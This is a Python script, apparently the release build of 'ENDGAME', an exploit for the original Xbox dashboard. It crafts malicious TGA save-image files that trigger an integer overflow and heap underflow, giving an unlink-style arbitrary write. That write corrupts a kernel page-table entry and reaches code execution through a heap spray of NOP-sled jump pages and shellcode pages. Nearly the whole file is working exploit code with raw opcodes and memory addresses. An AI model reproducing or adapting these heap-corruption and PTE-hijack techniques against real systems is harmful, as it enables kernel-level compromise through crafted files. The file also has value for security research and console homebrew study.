import os
import sys
import ctypes
import struct
import subprocess

try:
    import sim5960
    SIM_ENABLED = True
except ImportError:
    SIM_ENABLED = False

#------------------------------------------------------------------------------
# Util
#------------------------------------------------------------------------------

PAGE_SIZE = 0x1000
PTE_REGION = 0xc0000000

def pte_address(address):
    return PTE_REGION | (address >> 10)

def p32(value):
    return struct.pack("I", value)

def p16(value):
    return struct.pack("H", value)

#------------------------------------------------------------------------------
# Exploit
#------------------------------------------------------------------------------

BASE_PATH = os.path.join(os.path.dirname(__file__))
NASM_PATH = os.path.join(BASE_PATH, "nasm.exe")
ENDGAME_PATH = os.path.join(BASE_PATH, "ENDGAME")

#
# SPRAY_BASE represents the approximate memory address of where we expect our
# 8mb helper buffer to get decompressed and swizzled into memory.
#
# this buffer consists of two components of equal size that the exploit
# depends on to obtain arbitrary code execution. half is made up of 'jump
# pages' described later and the other half is shellcode pages.
#
# the *_MID variables should point approximately half way into each of the
# two regions. this allows for +/- 2mb of wiggle room based on how memory
# layout may drift a bit based on kernel, dash, or runtime discrepancies.
#
# the base address we hardcode was selected after scanning and dumping the
# exact address from the exploit running against several kernel and dash
# combinations. it should also be somewhat resilient to some amount of
# auxillary 'navigation' around the dash prior to triggering ENDGAME.
#

SPRAY_BASE        = 0xF271B000
SPRAY_JUMP_MID    = SPRAY_BASE + 0x200000
SPRAY_PAYLOAD_MID = SPRAY_BASE + 0x600000

#
# these two addresses represent the pages that we hope to 'sinkhole' by way of
# PTE corruption. by manipulating their underlying PTEs, we are able to make
# these point at entirely different pages in memory.
#
# the kernel page was hand selected based on reviewing the commonality between
# retail kernels and basic runtime testing. the second PTE we corrupt is
# mostly arbitrary but must be under the code selector limit (end of kernel)
#

TARGET_KERN_PAGE = 0x80022000
TARGET_XBEH_PAGE = 0x11000

TARGET_KERN_PTE = pte_address(TARGET_KERN_PAGE) # 0xc0200088
TARGET_XBEH_PTE = pte_address(TARGET_XBEH_PAGE) # 0xc0000044

def compile_shellcode(shellcode_filepath, debug=False):
    """
    Compile the shellcode at the given path and return its bytes.
    """
    assert shellcode_filepath.endswith(".asm")

    # Run nasm.exe and capture the output and errors
    command = [NASM_PATH, shellcode_filepath]
    if debug:
        command.insert(1, "-dDEBUG")

    print("[*] Assembling shellcode... ", end="")
    result = subprocess.run(command, capture_output=True)

    # Check the return code of the command
    if result.returncode == 0:
        output = result.stdout.decode()
        if output.strip():
            print(output)

    # the command failed, print the error and exit the script
    else:
        print("[-] Failed to compile shellcode...")
        print(result.stderr.decode())
        exit(1)

    print("done")

    # read the compiled shellcode from file and return it
    shellcode_bin_filepath, _ = os.path.splitext(shellcode_filepath)
    shellcode = open(shellcode_bin_filepath, "rb").read()
    return shellcode

def make_helper(compress, debug):
    """
    Generate the ENDGAME helper files (effectively a heap spray).
    """
    PTE_VALUE  = SPRAY_PAYLOAD_MID & 0xFFFFF000
    PTE_VALUE |= 0x63 # (Accessed | Dirty | Valid | Writable)

    #
    # the jump (page) payload should be as small as possible (byte-wise) in an
    # effort to minimize the chance that naturally occurring calls into the
    # kernel (within this page) land on anything but one of our NOP's
    #
    # ideally we want to setup a safer region of memory and get off this page
    # as fast as possible. we do this by corrupting a second PTE that should
    # be within the code selector limit (thus, executable) and unused
    #

    jump_payload = b""

    # corrupt XBE header PTE
    jump_payload += b"\xB8" + p32(TARGET_XBEH_PTE)    # mov    eax, 0xc0000044
    jump_payload += b"\xC7\x00" + p32(PTE_VALUE)      # mov    DWORD PTR [eax], 0xf2fb7063

    # jump to shellcode
    jump_payload += b"\x68" + p32(TARGET_XBEH_PAGE)   # push  target
    jump_payload += b"\x0F\x01\x3C\x24"               # invlpg [esp]
    jump_payload += b"\xC3"                           # ret

    #
    # Construct the full jump page + payload. a specific kernel .text PTE will
    # be corrupted to point at one of these precisely aligned jump pages.
    #

    jump_page  = b"\x90" * PAGE_SIZE
    jump_page += jump_payload

    # ensure the jump payload is aligned to the end of the jump page
    jump_page = jump_page[-PAGE_SIZE:]
    assert len(jump_page) == PAGE_SIZE

    #
    # because of the nature of heap unlink, a 4 byte value will get written
    # into one of our jump pages, specifically at the memory address:
    #
    #     PTE_VALUE  = ADDR_TRAMPOLINE & 0xFFFFF000
    #     PTE_VALUE |= 0x61
    #     PTE_VALUE += 0x4
    #     ...
    #     *PTE_VALUE = 0xYYYYYYYY
    #
    # we insert a 0x68 byte into the jump page, creating a simple but safe
    # no-op 'mov eax, 0xYYYYYYYY' instruction within the page's NOP-sled for
    # the off chance we land within the anomalous page
    #

    jump_page = bytearray(jump_page)
    jump_page[0x64] = 0xB8

    # replicate the completed single page across a 4mb block of memory
    jump_block = jump_page * 0x400
    assert len(jump_block) == 0x400000

    #
    # the shellcode page represents the phase of ENDGAME which equates to
    # fully unconstrained execution.
    #
    # in the current exploit structure, the shellcode should be less than
    # 4096 bytes. this is ample for doing cleanup / repair of the memory
    # space or further bootstrapping.
    #
    # the following logic will compile ENDGAME's shellcode with NASM and
    # return the resulting bytes.
    #

    shellcode_filepath = os.path.join(BASE_PATH, "shellcode.asm")
    shellcode = compile_shellcode(shellcode_filepath, debug)

    #
    # prefix the compiled shellcode (which *must* be position independent)
    # with NOP's to construct a full page.
    #

    shellcode_page  = b"\x90" * PAGE_SIZE
    shellcode_page += shellcode

    # ensure the shellcode payload is aligned to the end of the page
    shellcode_page = shellcode_page[-PAGE_SIZE:]
    assert len(shellcode_page) == PAGE_SIZE

    # replicate the completed single page across a 4mb block of memory
    shellcode_block = shellcode_page * 0x400
    assert len(shellcode_block) == 0x400000

    #
    # construct the full helper blob. this represents exactly what we hope to
    # see in memory once our texture has been fully decompressed and swizzled
    #
    # when debugging ENDGAME or researching this exploit, you can locate this
    # buffer in memory using the following WinDbg command:
    #
    #   kd> s F0000000 L08000000 41 51 61 71
    #

    full  = b""
    full += b"\x41\x51\x61\x71" # marker DWORD for debug / mem searching
    full += jump_block[4:]      # 4mb of jump pages
    full += shellcode_block     # 4mb of shellcode pages
    assert len(full) == (0x800000), f"Actual len 0x{len(full):X}"

    #
    # when being processed and loaded by the dashboard, our helper blob will
    # get SWIZZLED (as it is technically a d3d texture)... so we have to
    # preemptively UN-SWIZZLE it here.
    #
    # It's an 0x400 x 0x800 x 4 texture (so, 8mb).
    #

    print("[*] Un-swizzling payload... ", end="")
    unswiz_data = unswizzle32(full, 0x400, 0x800)
    print("done")

    #
    # the TGA format allows for run-length encoding of its data, so for fun
    # we actually compress our un-swizzled buffer to reduce its physical size
    # by over 10x (8mb --> 750kb) -- this ensures it should fit on any MU.
    #

    if compress:
        print("[*] Compressing payload... ", end="")
        final_data = rle_compress(unswiz_data, 0x400)
        print("done")
    else:
        final_data = unswiz_data

    #
    # for the purpose of this helper buffer/texture, we don't need to do
    # anything buggy. simply create a TGA of the proper dimensions, with
    # simple "top to bottom" and "left to right" properties
    #

    tga_data = make_tga(0x400, 0x800, 4, final_data, 0x28, compress)

    if SIM_ENABLED:
        LoadTGA = sim5960.LoadTGA()
        status, decomp_data, parsed = LoadTGA.run(tga_data)
        print(f"[*] Valid? {status == 0}, data left over... 0x{parsed:X}")
        if status:
            print(f"[-] FAIL: {status:08X}")
            assert False

    #
    # write the exploit "helper" files to disk. note that this SaveImage must
    # belong to a game title of alphabetical priority higher than the "trigger"
    # files. this ensures the dash maps our helper into memory first.
    #

    print("[*] Saving helper files... ", end="")

    spray_dir = os.path.join(ENDGAME_PATH, "helper", "0")
    os.makedirs(spray_dir, exist_ok=True)

    with open(os.path.join(spray_dir, "..", "TitleMeta.xbx"), "wb") as f:
        f.write(b"\xFF\xFE" + "TitleName=HELPER\r\n".encode("utf-16-le"))

    with open(os.path.join(spray_dir, "SaveImage.xbx"), "wb") as f:
        f.write(tga_data)

    # all done
    print("done")
    return

def make_trigger():
    """
    Generate the ENDGAME trigger files.
    """
    PTE_VALUE  = SPRAY_JUMP_MID & 0xFFFFF000
    PTE_VALUE |= 0x61 # (Accessed | Dirty | Valid)

    #
    # ENDGAME abuses an integer overflow in the allocation and processing of
    # TGA (image) files, enabling several powerful heap primitives.
    #
    # this is combined with TGA's 'bottom to top' image flag to perform a
    # 16-byte heap underflow, precisely corrupting the chunk's heap metadata
    # to setup a pretty traditional unlink-style write4 primitive.
    #
    # to make ENDGAME kernel and dash agnostic, it precisely targets the PTE
    # for a kernel .text page (kudos to mborgerson for the inspiration) as a
    # generic means of obtaining code execution from a single arbitrary write.
    #

    payload  = b""

    # this block overwrites the heap metadata (the 16 byte underflow)
    payload += p16(0x0001)          # -0x10 - Size
    payload += p16(0x0000)          # -0x0D - Previous size
    payload += b"\x00"              # -0x0C - Segment index
    payload += b"\x00"              # -0x0B - Flags
    payload += b"\x00"              # -0x0A - Index
    payload += b"\x00"              # -0x09 - Mask
    payload += p32(0x44444444)      # -0x08
    payload += p32(0x45454545)      # -0x04

    # this block will be at the start of our heap allocation (a fake chunk)
    payload += p16(0x1000)          # -0x10 - Size
    payload += p16(0x4343)          # -0x0D - Previous size
    payload += b"\x00"              # -0x0C - Segment index
    payload += b"\x00"              # -0x0B - Flags
    payload += b"\x00"              # -0x0A - Index
    payload += b"\x00"              # -0x09 - Mask
    payload += p32(PTE_VALUE)       # -0x08 - ENDGAME write value
    payload += p32(TARGET_KERN_PTE) # -0x04 - ENDGAME write address

    #
    # trigger info
    #
    #  - tga.width = 0xFFFD
    #  - tga.height = 0x8002
    #  - tga.img_depth = 2 (bytes, or 16bits)
    #  - tga.img_descriptor = 8 (bottom to top, left to right)
    #
    # (0xFFFD * 0x8002 * 2) = 0x10000FFF4
    #
    # NOTE: since we do not provide a sufficient amount of data to load a
    # complete image, the dash's TGA parsing logic fails and will immediately
    # free our corrupted chunk setting the full exploit into motion
    #

    tga_data = make_tga(0x8002, 0xFFFD, 2, payload, 8, False)

    #
    # write the exploit "trigger" files to disk. note that this SaveImage must
    # belong to a game title of alphabetical priority lower than the "helper"
    # files. this ensures the dash triggers the exploit at the correct time
    #

    print("[*] Saving trigger files... ", end="")

    trigger_dir = os.path.join(ENDGAME_PATH, "trigger", "1")
    os.makedirs(trigger_dir, exist_ok=True)

    with open(os.path.join(trigger_dir, "..", "TitleMeta.xbx"), "wb") as f:
        f.write(b"\xFF\xFE" + "TitleName=TRIGGER\r\n".encode("utf-16-le"))

    with open(os.path.join(trigger_dir, "SaveImage.xbx"), "wb") as f:
        f.write(tga_data)

    # all done
    print("done")
    return

#------------------------------------------------------------------------------
# DirectX (special thanks to xbox7887)
#------------------------------------------------------------------------------

def generate_swizzle_masks(width, height):
    """
    Generate bit masks for swizzling based on the given dimensions.
    """
    assert (width > 0 and (width & (width - 1)) == 0), "Width must be a power of 2"
    assert (height > 0 and (height & (height - 1)) == 0), "Height must be a power of 2"
    x, y = 0, 0
    bit, mask_bit = 1, 1
    done = False
    while not done:
        done = True
        if bit < width:
            x |= mask_bit
            mask_bit <<= 1
            done = False
        if bit < height:
            y |= mask_bit
            mask_bit <<= 1
            done = False
        bit <<= 1
    return x, y

def fill_swizzle_pattern(pattern, value):
    """
    Apply swizzle pattern to a given value for address calculation.
    """
    result = 0
    bit = 1
    while value != 0:
        if pattern & bit != 0:
            result |= bit if value & 1 != 0 else 0
            value >>= 1
        bit <<= 1
    return result

def unswizzle32(data, width, height):
    """
    Convert swizzled buffer to linear format for 32-bit pixels.
    """
    mask_x, mask_y = generate_swizzle_masks(width, height)
    dst_buf = bytearray(len(data))
    for y in range(height):
        src_y_offset = fill_swizzle_pattern(mask_y, y) * 4
        dst_y_offset = width * y * 4
        for x in range(width):
            src_offset = src_y_offset + fill_swizzle_pattern(mask_x, x) * 4
            dst_offset = dst_y_offset + x * 4
            dst_buf[dst_offset:dst_offset+4] = data[src_offset:src_offset+4]
    return bytes(dst_buf)

#------------------------------------------------------------------------------
# Truevision TGA
#------------------------------------------------------------------------------

class TGAHeader(ctypes.Structure):
    _pack_ = 1
    _fields_ = [
        ("id_len", ctypes.c_byte),
        ("color_map_type", ctypes.c_byte),
        ("img_type", ctypes.c_byte),
        ("color_map_ofs", ctypes.c_ushort),
        ("num_color_map", ctypes.c_ushort),
        ("color_map_depth", ctypes.c_byte),
        ("x_offset", ctypes.c_ushort),
        ("y_offset", ctypes.c_ushort),
        ("width", ctypes.c_ushort),
        ("height", ctypes.c_ushort),
        ("img_depth", ctypes.c_byte),
        ("img_descriptor", ctypes.c_byte)
    ]

    @property
    def top_to_bottom(self):
        return (self.img_descriptor & 0x20) == 0x20

    @property
    def left_to_right(self):
        return (self.img_descriptor & 0x10) != 0x10

    @property
    def compressed(self):
        return bool(self.img_type & 0x08)

    def __str__(self):
        """
        Pretty-print the TGAHeader.
        """
        lines = ["TGAHeader - "]

        for field_name, field_type in self._fields_:
            value = getattr(self, field_name)
            line = f"{field_name.rjust(18, ' ')}: 0x{value:02X}"
            lines.append(line)
            if field_name == "img_type":
                lines.append(f"         |--- compressed: {self.compressed}")

            if field_name == "img_descriptor":
                lines.append(f"   |- top_to_bottom: {self.top_to_bottom}")
                lines.append(f"   |- left_to_right: {self.left_to_right}")

        return "\n".join(lines)

def make_tga(width, height, depth=4, data=b"", descriptor=8, rle=True):
    """
    Initialize a TGA with the given properties and return its bytes.
    """
    tga = TGAHeader()
    tga.img_type  = 2
    tga.img_type |= (int(rle) << 3)

    if not (0 < width < 0x10000):
        raise ValueError("Invalid width")
    if not (0 < height < 0x10000):
        raise ValueError("Invalid height")

    tga.width = width
    tga.height = height

    if not (0 < depth < 5):
        raise ValueError("Invalid depth")

    tga.img_depth = (depth * 8)
    tga.img_descriptor = descriptor

    return bytes(tga) + data

def rle_compress(data, width):
    """
    Run-length encode (compress) the given data for a TGA image.
    """
    depth = 4
    output = bytearray()

    for row_start in range(0, len(data), width):
        offset = row_start
        while offset < row_start + width:
            pattern = data[offset:offset+depth]
            offset += depth
            count = 0

            while offset < row_start + width and data[offset:offset+depth] == pattern and count < 127:
                count += 1
                offset += depth

            rle_byte = 0x80 | count if count else 0
            output.extend([rle_byte] + list(pattern))

    return bytes(output)

#------------------------------------------------------------------------------
# Main
#------------------------------------------------------------------------------

def main(argc, argv):
    """
    Script main.
    """

    # simple argument parsing / check to build a debug version of the exploit
    debug = argc > 1 and argv[1] in ["-d", "--debug"]

    # generate the ENDGAME exploit files
    print(f"[*] Generating ENDGAME v1.0{' (debug)' if debug else ''} exploit files -- by Markus Gaasedelen & shutterbug2000")
    make_helper(True, debug)
    make_trigger()
    print(f"[+] Success, exploit files available in ENDGAME/ directory")

if __name__ == "__main__":
    main(len(sys.argv), sys.argv)